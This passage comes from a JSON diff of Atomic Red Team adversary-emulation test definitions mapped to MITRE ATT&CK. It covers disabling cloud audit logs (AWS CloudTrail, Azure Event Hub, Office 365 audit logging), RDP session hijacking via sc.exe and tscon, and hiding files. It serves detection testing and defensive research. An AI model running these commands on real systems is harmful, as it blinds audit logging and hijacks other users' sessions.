us-east-1\naws cloudtrail stop-logging --name #{cloudtrail_name} --region us-east-1\naws cloudtrail delete-trail --name #{cloudtrail_name} --region us-east-1\n", + null, + "$secure_pwd = \"#{password}\" | ConvertTo-SecureString -AsPlainText -Force\n$creds = New-Object System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $secure_pwd\nConnect-AzureAD -Credential $creds\nNew-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name test_eventhub\nRemove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name test_eventhub\n" + ], + "commands": [ + { + "command": "aws cloudtrail create-trail --name redatomictesttrail --s3-bucket-name #{s3_bucket_name} --region #{region}\naws cloudtrail update-trail --name redatomictesttrail --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region}\naws cloudtrail stop-logging --name redatomictesttrail --region #{region}\naws cloudtrail delete-trail --name redatomictesttrail --region #{region}\n", + "source": "atomics/T1562.008/T1562.008.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Cloud Logs" + }, + { + "command": "aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name redatomic-test --region #{region}\naws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name redatomic-test --is-multi-region-trail --region #{region}\naws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}\naws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}\n", + "source": "atomics/T1562.008/T1562.008.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Cloud Logs" + }, + { + "command": "aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region us-east-1\naws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region us-east-1\naws cloudtrail stop-logging --name #{cloudtrail_name} --region us-east-1\naws cloudtrail delete-trail --name #{cloudtrail_name} --region us-east-1\n", + "source": "atomics/T1562.008/T1562.008.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Cloud Logs" + }, + { + "command": null, + "source": "atomics/T1562.008/T1562.008.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Cloud Logs" + }, + { + "command": "$secure_pwd = \"#{password}\" | ConvertTo-SecureString -AsPlainText -Force\n$creds = New-Object System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $secure_pwd\nConnect-AzureAD -Credential $creds\nNew-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name test_eventhub\nRemove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name test_eventhub\n", + "source": "atomics/T1562.008/T1562.008.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Cloud Logs" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1562.008", + "display_name": "Impair Defenses: Disable Cloud Logs", + "atomic_tests": [ + { + "name": "AWS CloudTrail Changes", + "auto_generated_guid": "9c10dc6b-20bd-403a-8e67-50ef7d07ed4e", + "description": "Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail\n", + "supported_platforms": [ + "iaas:aws" + ], + "input_arguments": { + "cloudtrail_name": { + "description": "Name of the cloudTrail", + "type": "String", + "default": "redatomictesttrail" + }, + "s3_bucket_name": { + "description": "Name of the bucket", + "type": "String", + "default": "redatomic-test" + }, + "region": { + "description": "Name of the region", + "type": "String", + "default": "us-east-1" + } + }, + "dependencies": [ + { + "description": "Check if ~/.aws/credentials file has a default stanza is configured\n", + "prereq_command": "cat ~/.aws/credentials | grep \"default\"\naws s3api create-bucket --bucket #{s3_bucket_name} --region #{region}\naws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1562.008/src/policy.json\n", + "get_prereq_command": "echo Please install the aws-cli and configure your AWS defult profile using: aws configure\n" + } + ], + "executor": { + "command": "aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region}\naws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region}\naws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}\naws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}\n", + "cleanup_command": "aws s3 rb s3://#{s3_bucket_name} --force \n", + "name": "sh", + "elevation_required": false + } + }, + { + "name": "Azure - Eventhub Deletion", + "auto_generated_guid": "5e09bed0-7d33-453b-9bf3-caea32bff719", + "description": "Identifies an Event Hub deletion in Azure.\nAn Event Hub is an event processing service that ingests and processes large volumes of events and data.\nAn adversary may delete an Event Hub in an attempt to evade detection.\nhttps://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about.\n", + "supported_platforms": [ + "iaas:azure" + ], + "input_arguments": { + "username": { + "description": "Azure username", + "type": "String", + "default": null + }, + "password": { + "description": "Azure password", + "type": "String", + "default": null + }, + "event_hub_name": { + "description": "Name of the eventhub", + "type": "String", + "default": "test_eventhub" + }, + "resource_group": { + "description": "Name of the resource group", + "type": "String", + "default": null + }, + "name_space_name": { + "description": "Name of the NameSpace", + "type": "String", + "default": null + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Install-Module -Name Az\n", + "prereq_command": "try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "Install-Module -Name AzureAD -Force\n" + } + ], + "executor": { + "command": "$secure_pwd = \"#{password}\" | ConvertTo-SecureString -AsPlainText -Force\n$creds = New-Object System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $secure_pwd\nConnect-AzureAD -Credential $creds\nNew-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name}\nRemove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Office 365 - Exchange Audit Log Disabled", + "auto_generated_guid": "1ee572f3-056c-4632-a7fc-7e7c42b1543c", + "description": "You can use the Exchange Management Shell to enable or disable mailbox audit logging for a mailbox.\nUnified or Admin Audit logs are disabled via the Exchange Powershell cmdline.\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Detections/OfficeActivity/exchange_auditlogdisabled.yaml\n", + "supported_platforms": [ + "office-365" + ], + "input_arguments": { + "username": { + "description": "office-365 username", + "type": "String", + "default": null + }, + "password": { + "description": "office-365 password", + "type": "String", + "default": null + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "ExchangeOnlineManagement PowerShell module must be installed\n", + "prereq_command": "$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}\n", + "get_prereq_command": "Install-Module -Name ExchangeOnlineManagement \nImport-Module ExchangeOnlineManagement\n" + } + ], + "executor": { + "command": "$secure_pwd = \"#{password}\" | ConvertTo-SecureString -AsPlainText -Force\n$creds = New-Object System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $secure_pwd\nConnect-ExchangeOnline -Credential $creds\nSet-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $False\n", + "cleanup_command": "$secure_pwd = \"#{password}\" | ConvertTo-SecureString -AsPlainText -Force\n$creds = New-Object System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $secure_pwd\nConnect-ExchangeOnline -Credential $creds\nSet-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $True\n", + "name": "powershell", + "elevation_required": false + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "cloud service", + "definition": "Information about a service available within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "cloud service modification", + "description": "A cloud service was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "cloud service" + }, + { + "data_source": "cloud service", + "definition": "Information about a service available within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "cloud service disable", + "description": "A cloud service was disabled.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "cloud service" + } + ], + "external_reference": [ + [ + "https://aws.amazon.com", + "https://azure.microsoft.com/en-us/services/" + ] + ] + }, + { + "technique_id": "T1563.002", + "command_list": [ + "query user\nsc.exe create sesshijack binpath= \"cmd.exe /k tscon 1337 /dest:#{Destination_ID}\"\nnet start sesshijack\n", + "query user\nsc.exe create sesshijack binpath= \"cmd.exe /k tscon #{Session_ID} /dest:rdp-tcp#55\"\nnet start sesshijack\n" + ], + "commands": [ + { + "command": "query user\nsc.exe create sesshijack binpath= \"cmd.exe /k tscon 1337 /dest:#{Destination_ID}\"\nnet start sesshijack\n", + "source": "atomics/T1563.002/T1563.002.yaml", + "name": "Atomic Red Team Test - Remote Service Session Hijacking: RDP Hijacking" + }, + { + "command": "query user\nsc.exe create sesshijack binpath= \"cmd.exe /k tscon #{Session_ID} /dest:rdp-tcp#55\"\nnet start sesshijack\n", + "source": "atomics/T1563.002/T1563.002.yaml", + "name": "Atomic Red Team Test - Remote Service Session Hijacking: RDP Hijacking" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1563.002", + "display_name": "Remote Service Session Hijacking: RDP Hijacking", + "atomic_tests": [ + { + "name": "RDP hijacking", + "auto_generated_guid": "a37ac520-b911-458e-8aed-c5f1576d9f46", + "description": "[RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "Session_ID": { + "description": "The ID of the session to which you want to connect", + "type": "String", + "default": "1337" + }, + "Destination_ID": { + "description": "Connect the session of another user to a different session", + "type": "String", + "default": "rdp-tcp#55" + } + }, + "executor": { + "command": "query user\nsc.exe create sesshijack binpath= \"cmd.exe /k tscon #{Session_ID} /dest:#{Destination_ID}\"\nnet start sesshijack\n", + "cleanup_command": "sc.exe delete sesshijack >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1564.001", + "command_list": [ + "mkdir /var/tmp/.hidden-directory\necho \"T1564.001\" > /var/tmp/.hidden-directory/.hidden-file\n", + "xattr -lr * / 2>&1 /dev/null | grep -C 2 \"00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00\"\n", + "attrib.exe +s %temp%\\T1564.001.txt\n", + "attrib.exe +h %temp%\\T1564.001.txt\n", + "setfile -a V /tmp/evil\n", + "touch /var/tmp/T1564.001_mac.txt\nchflags hidden /var/tmp/T1564.001_mac.txt\n", + "defaults write com.apple.finder AppleShowAllFiles YES\n", + "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced /v Hidden /t REG_DWORD /d 0 /f\n" + ], + "commands": [ + { + "command": "mkdir /var/tmp/.hidden-directory\necho \"T1564.001\" > /var/tmp/.hidden-directory/.hidden-file\n", + "source": "atomics/T1564.001/T1564.001.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Files and Directories" + }, + { + "command": "xattr -lr * / 2>&1 /dev/null | grep -C 2 \"00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00\"\n", + "source": "atomics/T1564.001/T1564.001.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Files and Directories" + }, + { + "command": "attrib.exe +s %temp%\\T1564.001.txt\n", + "source": "atomics/T1564.001/T1564.001.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Files and Directories" + }, + { + "command": "attrib.exe +h %temp%\\T1564.001.txt\n", + "source": "atomics/T1564.001/T1564.001.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Files and Directories" + }, + { + "command": "setfile -a V /tmp/evil\n", + "source": "atomics/T1564.001/T1564.001.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Files and Directories" + }, + { + "command": "touch /var/tmp/T1564.001_mac.txt\nchflags hidden /var/tmp/T1564.001_mac.txt\n", + "source": "atomics/T1564.001/T1564.001.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Files and Directories" + }, + { + "command": "defaults write com.apple.finder AppleShowAllFiles YES\n", + "source": "atomics/T1564.001/T1564.001.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Files and Directories" + }, + { + "command": "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced /v Hidden /t REG_DWORD /d 0 /f\n", + "source": "atomics/T1564.001/T1564.001.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Files and Directories" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1564.001", + "display_name": "Hide Artifacts: Hidden Files and Directories", + "atomic_tests": [ + { + "name": "Create a hidden file in a hidden directory", + "auto_generated_guid": "61a782e5-9a19-40b5-8ba4-69a4b9f3d7be", + "description": "Creates a hidden file inside a hidden directory\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "mkdir /var/tmp/.hidden-directory\necho \"T1564.001\" > /var/tmp/.hidden-directory/.hidden-file\n", + "cleanup_command": "rm -rf /var/tmp/.hidden-directory/\n", + "name": "sh" + } + }, + { + "name": "Mac Hidden file", + "auto_generated_guid": "cddb9098-3b47-4e01-9d3b-6f5f323288a9", + "description": "Hide a file on MacOS\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "xattr -lr * / 2>&1 /dev/null | grep -C 2 \"00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00\"\n", + "name": "sh" + } + }, + { + "name": "Create Windows System File with Attrib", + "auto_generated_guid": "f70974c8-c094-4574-b542-2c545af95a32", + "description": "Creates a file and marks it as a system file using the attrib.exe utility. Upon execution, open the file in file explorer then open Properties > Details\nand observe that the Attributes are \"SA\" for System and Archive.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_to_modify": { + "description": "File to modify using Attrib command", + "type": "String", + "default": "%temp%\\T1564.001.txt" + } + }, + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "The file must exist on disk at specified location (#{file_to_modify})\n", + "prereq_command": "IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )\n", + "get_prereq_command": "echo system_Attrib_T1564.001 >> #{file_to_modify}\n" + } + ], + "executor": { + "command": "attrib.exe +s #{file_to_modify}\n", + "cleanup_command": "del /A:S #{file_to_modify} >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Create Windows Hidden File with Attrib", + "auto_generated_guid": "dadb792e-4358-4d8d-9207-b771faa0daa5", + "description": "Creates a file and marks it as hidden using the attrib.exe utility.Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file\nand observe that the Attributes are \"SH\" for System and Hidden.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_to_modify": { + "description": "File to modify using Attrib command", + "type": "String", + "default": "%temp%\\T1564.001.txt" + } + }, + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "The file must exist on disk at specified location (#{file_to_modify})\n", + "prereq_command": "IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )\n", + "get_prereq_command": "echo system_Attrib_T1564.001 >> #{file_to_modify}\n" + } + ], + "executor": { + "command": "attrib.exe +h #{file_to_modify}\n", + "cleanup_command": "del /A:H #{file_to_modify} >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Hidden files", + "auto_generated_guid": "3b7015f2-3144-4205-b799-b05580621379", + "description": "Requires Apple Dev Tools\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "filename": { + "description": "path of file to hide", + "type": "Path", + "default": "/tmp/evil" + } + }, + "executor": { + "command": "setfile -a V #{filename}\n", + "name": "sh" + } + }, + { + "name": "Hide a Directory", + "auto_generated_guid": "b115ecaf-3b24-4ed2-aefe-2fcb9db913d3", + "description": "Hide a directory on MacOS\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "touch /var/tmp/T1564.001_mac.txt\nchflags hidden /var/tmp/T1564.001_mac.txt\n", + "cleanup_command": "rm /var/tmp/T1564.001_mac.txt\n", + "name": "sh" + } + }, + { + "name": "Show all hidden files", + "auto_generated_guid": "9a1ec7da-b892-449f-ad68-67066d04380c", + "description": "Show all hidden files on MacOS\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "defaults write com.apple.finder AppleShowAllFiles YES\n", + "cleanup_command": "defaults write com.apple.finder AppleShowAllFiles NO\n", + "name": "sh" + } + }, + { + "name": "Hide Files Through Registry", + "auto_generated_guid": "f650456b-bd49-4bc1-ae9d-271b5b9581e7", + "description": "Disable Show Hidden files switch in registry. This technique was abused by several malware to hide their files from normal user.\nSee how this trojan abuses this technique - https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/W32~Tiotua-P/detailed-analysis.aspx \n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced /v Hidden /t REG_DWORD /d 0 /f\n", + "cleanup_command": "reg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v ShowSuperHidden /f >nul 2>&1\nreg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v Hidden /f >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or 